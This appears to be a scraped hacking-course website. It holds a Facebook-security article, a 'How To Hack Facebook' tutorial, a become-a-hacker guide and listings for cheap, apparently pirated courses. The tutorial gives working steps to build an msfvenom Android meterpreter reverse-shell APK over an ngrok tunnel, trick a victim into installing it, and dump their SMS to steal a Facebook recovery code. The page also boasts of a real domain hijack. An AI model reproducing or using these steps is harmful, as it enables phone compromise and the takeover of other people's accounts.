How To Secure Facebook Acoount

How To Secure Facebook Account

Facebook account is almost but still there is some methods by which we can hack Facebook account easily, One of the most secured site in world, Facebook which ranks in Top 10 security level.Facebook keep personal data private and never share with other Facebook have access of our mobile messages , storage , camera etc. But Facebook never share our personal data an keep them private.Today we will talk about how to secure our Facebook account and how to stay safe from hackers.

Advertisements

Strong Password

Always use strong password because we can easily find easy password such password some time people use their name , Birth date , username or common word that they use in daily life so people can guess such types of password and get unauthorized access to our account, So i recommended you to use strong password and never use a word which you used in daily Life

How to create a strong password

  • Must use 1 capital latter
  • Must use 1 letter word
  • Must use 1 symbol letter (!@#$%^&*)
  • Always use long password as you remember
  • Never use common words

By following these you can create a strong password and also you will be safe from brute force attack

2 Factor authenticating

We can secured our account using 2 Factor authenticating. when  2 Factor authenticating is enabled you will login to your account you will receive message from Facebook team with 6 digit code when you enter that code than you will be able to login other wise not possible

How to enable

  • Open setting and privacy in facebook
  • Now go to settings tab
  • Now click on Security an login
  • Now click on Use Two-factor authenticating
  • click on get started
  • Enter your password if required
  • You can also use your mobile or your SIM
  • Click On Text Messaage
  • use your number you will receive 6 digit code
  • enter the code and Done

Never Use common words

never use common words because people guess it and can easily get access o your account.Common words like your name , your birth date , your address , your nick name , or some thing like you use in daily life so people guest it and create a word list and get access of your account

Phishing

what is phishing?

phishing is an attack in which we send a link to victim and convince them to login their account when he/she login to account their account we got all information.

how to secure account from phishing

  • Use 2 factor-authenticating
  • If your friend or stranger send you link never login their
  • always check site is that official site
  • never login in other site which look similar to Facebook but from other domain
  • Never reply to email which ask for password an email even if email come from Facebook team

DNS Spoofing

DNS spoofing is an attack in which we force to redirect a victim to another website.We can redirect a victim to any website by DNS spoofing.so we will redirect our victim to phishing page when he will search for Facebook and open site he will redirect automatic to phishing page

One of our most honorable friend Salman Arif Khan (Black Scorpion) also hacked Microsoft.com.bd by DNS hijacking Method.

How to safe?

  • Use 2 factor Authenticating

Key logger

key logger can be bind in app EXE file or file etc.key logger is virus which capture each and every word we type so if some one send app or file in which key logger is bind so if we login to our Facebook account so he can easily access to our Facebook account. key logger send our bank information to hacker

How to safe?

  • Use 2 factor authenticating
  • Never install app send by friend or stranger
  • always look for official site and download from their not from other site

Man in the Middle Attack

man-in-the-middle attack (MITM) is an attack where the attacker secretly relays and possibly alters the communication between two parties who believe they are directly communicating with each other, Now one question come into your mind that how Facebook can be hacked by Man in the middle attack , So here is steps

  • First we will will create a Fake Network you can also use lots of tools (WiFi phisher)
  • when victim connect to that network
  • you can route the network traffic to the fake Facebook login page

How to safe?

  • Never connect unencrypted wifi
  • If you have difficulties to connect your own WiFi scan for nearby WiFi if found same name network than some one is trying MITM on your nwteork
  •  Also if the router asks for password information for performing some kind of internet update, then it is likely that someone is trying to get access and steal your personal information.

Hacking Courses are available at cheap rate , Visit Here

Visit our other site

https://www.sprotechs.com/

Forum

https://forum.sprotechs.com/

How To Hack Facebook

How To Hack Facebook

Lots of people think that Facebook hacking is impossible so they are wrong, Yes i agree with them that Mark Zuckerberg  patched lots of methods but still there is one method by which we can hack into Facebook.The method is too hard, but you can learn easily

Advertisements

Requirements

Kali Linux Download here  if you wanna learn Kali Linux learn HERE 

Facebook hacking short view

  • First we will create a payload using metasploit or you can use rats such as fatrat
  • Than by social engineering we nee to convince victim an sen payload to him
  • When victim open payload sessions will be open
  • If you have victim Mobil number than good if not we can get easily
  • After getting number go to Facebook an click on forgot password
  • Enter Victim number in forgot password and than click on send code to number
  • after that dump messages from victim phone and recover his account

Method step vise

  • First go to  NGROK and create account an after that download ngrok

ngrok

  • than open terminal in Kali Linux and navigate that folder where you have ngrok unzip and verified with your account than enter this command ./ngrok tcp 22 (you can use any port i use this port) you will get new port and localhost from ngrok marked in below picture

ngreok

  • open new terminal an type the following command
  • msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=(the port which you get from ngrok)  R > /root/Desktop/fb.apk

fbha

  • when payload is ready we need to set up listener enter the following

use exploit/multi/handler

set PAYLOAD android/meterpreter/reverse_tcp

set LHOST 127.0.0.1

set LPORT 22 ( which you used in ngok)

exploit or exploit -j (exploit -j recommended)

listner

  • when listener is done, now send payload to victim when he install an open payload sessions will be open

TIME TO HACK FACEBOOK

  • First we need victim number if not available you can get it easily enter the following command
  • send_sms -t “anything” -d your number  ( you will receive message from him )
  • enter that number HERE and wait one minute
  • after that enter the command (dump_sms ) you will get all messages from target phone find recovery code enter in Facebook and change password
  • All done Enjoy

Watch Video Below

How to Become A Hacker

Hacking

what is Hacking?

Hacking is skill to find Valunerabilities in a  computer or network and exploit then and get Unauthorized access of that network is called Hacking.Hacking is legal as well as illegal.If you have permission in written form from the owner and you exploit that network and get access to that network is legal hacking.If you don’t have permission and you exploit network or hack computer is it’s not legal.If you wanna penetrate Network You must have permission in written form to penetrate that network an exploit them.

Advertisements

How to Become  a hacker?

There are 5 Steps to become an ethical hacker.

  • Basic Computer Skills

To become an ethical hacker the first step is to learn some basic of computer.How to surf in browsers.How internet work. These skills go beyond the ability to create a Word document or cruise the Internet. You need to be able to use the command line in Windows, edit the registry, and set up your networking parameters.

  • Networking Skills

you must have some knowledge about network.Following are most important in Network

  • DHCP
  • NAT
  • Subnetting
  • IPv4
  • IPv6
  • Public v Private IP
  • DNS
  • Routers and switches
  • VLANs
  • OSI model
  • MAC addressing
  • ARP

If you successfully learn these following than it will help you to learn ethical hacking quicker.It is very informative for to become an ethical hacking because some of them will help us in penetrate a network.Its quiet easy and 2nd important step to learn ethical hacking and become an ethical hacker

  • Programming (optional)

It’s not required to learn but if you didn’t learn programming than you will be called a script kiddie.Here will one question come into your mind that

“what is Script Kiddie?”

script kiddie is a hacker who used Pre-made tools an script who have no Knowledge how to create their own tools and scripts.

C , C++ , Python are programming language if you wanna learn

  • Resources

If you wanna learn ethical Hacking you must need some online resource or book or videos to learn hacking from that.So i will recommend some  resources.

Books

These are the recommended Books You can Download more Books From HERE

Courses

Online Resource

 

  • Practice

To Become  a good ethical Hacker and improve your skills you need to practice.Practice will help you to Improve your skills.A daily basis practice  will help you to become an good ethical hacker.But keep practicing on your local network.

Hacking and Programming

Hacking and Programming Courses Introduction

Course sellers – Best Website for to get alots of tools and courses at very price.The Best we Provide the less we Take.We provide many courses an tools about “hacking”,”Programming” and “Earning”. Come and learn from us and from our courses. Become hero from zero at “Hacking” , “programming” and “Earning”

What We Provide

we provide many tools and courses at very tools. We provide the best tools and courses about Hacking , Programming , Earnings , facebook ads etc. You can request for courses at Contact page.Don’t be shy feel free to request for course.we will provide that course at lower price than where official site selling.we will give you that course upto 75% off.We provide best tools and courses at very low price.You can get higher price courses t 1$ , 2$ , 5$ or upto 10$ no course will be higher than this price.This is one time payment once you get course you can download course again and again.

What Is Our mission

Our mission is to teach you  best.To make you Hero from Zero.You can go upto master level from noob level.all courses we provide no previous knowledge is required buy any course and start from beginner level to advanced level and become professional at hacking , programming , earning , web development  and earning money or monetizing ads on facebook or youtube

Special topics

Hacking

Learn Ethical Hacking

Ethical Hacking
Ethical Hacking Learn ethical hacking
  1.   120 videos about ethical Hacking and computer security
  2.   what is ethical hacking and different types of hacking
  3.   set up kali linux and virtual lab for Penetration
  4.   learn some basics of linux (basics commands , interact with terminal)
  5.   Network Penetration (network basics , how device interact with network , attacks that can be used without knowing the key to the target network , control connection without password)
  6. wifi hacking ( fake wifi network , Crack WEP/WPA/WPA2 , ARP Spoofing/ARP Poisonning)
  7. gathering information about network
  8. Man in the middle
  9. Discover open ports, installed services and vulnerabilities on computer systems
  10. Gain control over computer systems using server side attacks
  11. Backoors ( create , embed , hack pc android with backdoor)
  12. email spoof
  13. web ( how web work , how communicate , find hosted site on same server )
  14. website hacking ( sqli , lfi , rfi ,code execution , bypass login , xss etc ) etc…

The Complete Ethical Hacking Course: Beginner to Advanced!

 

Complete Ethical Hacking from beg to Pro
Complete Ethical Hacking from beg to pro
  1. hacking intro

  2. Know what is hacking, ethical hacking and diffirent types of hackers
  3. Learn about the different fields of ethical hacking
  4. Set up a lab environment to practice hacking
  5. Install Kali Linux – a penetration testing operating system
  6. Install windows & vulnerable operating systems as virtual machines for testing
  7. Learn linux basics
  8. Learn linux commands and how to interact with the terminal

Network and Network Hacking

  1. Learn Network Penetration Testing
  2. Network basics & how devices interact inside a network
  3. A number of practical attacks that can be used without knowing the key to the target network
  4. Control connections of clients around you without knowing the password.
  5. Create a fake Wi-Fi network with internet connection & spy on clients
  6. Gather detailed information about clients and networks like their OS, opened ports …etc.
  7. Crack WEP/WPA/WPA2 encryptions using a number of methods.
  8. ARP Spoofing/ARP Poisonning
  9. Launch Various Man In The Middle attacks.
  10. Gain access to any account accessed by any client in your network.
  11. Sniff packets from clients and analyse them to extract important info such as: passwords, cookies, urls,
  12. videos, images ..etc.
  13. Discover open ports, installed services and vulnerabilities on computer systems
  14. Gain control over computer systems using server side attacks
  15. Exploit buffer over flows and code execution vulnerabilities to gain control over systems
  16. Gain control over computer systems using client side attacks
  17. Gain control over computer systems using fake updates
  18. Gain control over computer systems by backdooring downloads on the fly
  19. Create undetectable backdoors
  20. Backdoor normal programs
  21. Backdoor any file type such as pictures, pdf’s …etc.
  22. Gather information about people, such as emails, social media accounts, emails and friends
  23. Use social engineering to gain full control over target systems
  24. Send emails from ANY email account without knowing the password for that account
  25. Read, write download, upload and execute files on compromised systems
  26. Capture key strikes on a compromised system
  27. Use a compromised computer as a pivot to gain access to other computers on the same network

Web Application

  1. Understand how websites & web applications work
  2. Understand how browsers communicate with websites
  3. Gather sensitive information about websites
  4. Discover servers, technologies and services used on target website
  5. Discover emails and sensitive data associated with a specific website
  6. Find all subdomains associated with a website
  7. Discover unpublished directories and files associated with a target website
  8. Find all websites hosted on the same server as the target website
  9. Exploit file upload vulnerabilities & gain full control over the target website
  10. Discover, exploit and fix code execution vulnerabilities
  11. Discover, exploit & fix local file inclusion vulnerabilities
  12. Discover, fix, and exploit SQL injection vulnerabilities
  13. Bypass login forms and login as admin using SQL injections
  14. Writing SQL queries to find databases, tables and sensitive data such as usernames ad passwords
  15. using SQL injections
  16. Read / Write files to the server using SQL injections
  17. Learn the right way to write SQL queries to prevent SQL injections
  18. Discover reflected XSS vulnerabilities
  19. Discover Stored XSS vulnerabilities
  20. Hook victims to BeEF using XSS vulnerabilities
  21. Fix XSS vulnerabilities & protect yourself from them as a user

Learn social Engneering

  1. Social engineering (what is hacking , social engineering and why dangerous )
  2. Installing Kali Linux and basics of Kali Linux And create virtual Lab
  3. Gathering Information
  4. Generate undetectable backdoors for Windows, Mac OS & Linux.
  5. Generate trojans fo stealing passwords and keyloggers
  6. Modifying malware to bypass anti-virus
  7. Embed Payloads in doc exe etc
  8. Hack windows , android , OS X , Kali Linux
  9. Create website look like same site
  10. Deliver evil files as fake updates, fake installers ..etc
  11. Maintain your access to the hacked systems even after they restart
  12. Analyse files & detect undetectable malware.
  13. Use a sandbox to analyse undetectable malware.

Programming

Java

java 8

  1. How To create functional java 8 programs
  2. How to code
  3. Cutting off useless fluff and filter
  4. How to easily writes advance program for all platforms
  5. Become Java 8 expert
  6. The core skills needed to program for big clients, as a travelling freelancer or from home

C++ FROM BEGINNER TO EXPERT

  1. semantics of the cpp
  2. what is compiler / IDE
  3. variables / types of variables
  4. input / output streams and validation of data
  5. operators – arithmetic, assigment, logical, bitwise
  6. conditions like if / else / switch
  7. arrays / multi-dimensional arrays
  8. loops – for / while / do-while
  9. functions, overloading functions, passing variables to functions etc.
  10. structures
  11. referencers
  12. pointers
  13. dynamic allocation of memory
  14. creating project in IDE
  15. classes
  16. object oriented programming
  17. class and function templates
  18. namespaces
  19. exceptions
  20. fstream library (i/o operation on files)

THE COMPLETE PYTHON MASTERCLASS: LEARN PYTHON

Python

  • Understand & learn each and every Python concept.
  • Make Web-Applications using Python.
  • Make GUI based Applications in Python using Tkinter
  • Learn how to make full-stack web apps using Python and Django
  • Learn how to make your own web-scraping tool using Python
  • Understand all Django concepts
  • Uderstand all Flask Concepts

You can also  buy these Courses from Udemy

 

0 WooCommerce Floating Cart

No products in the cart.

X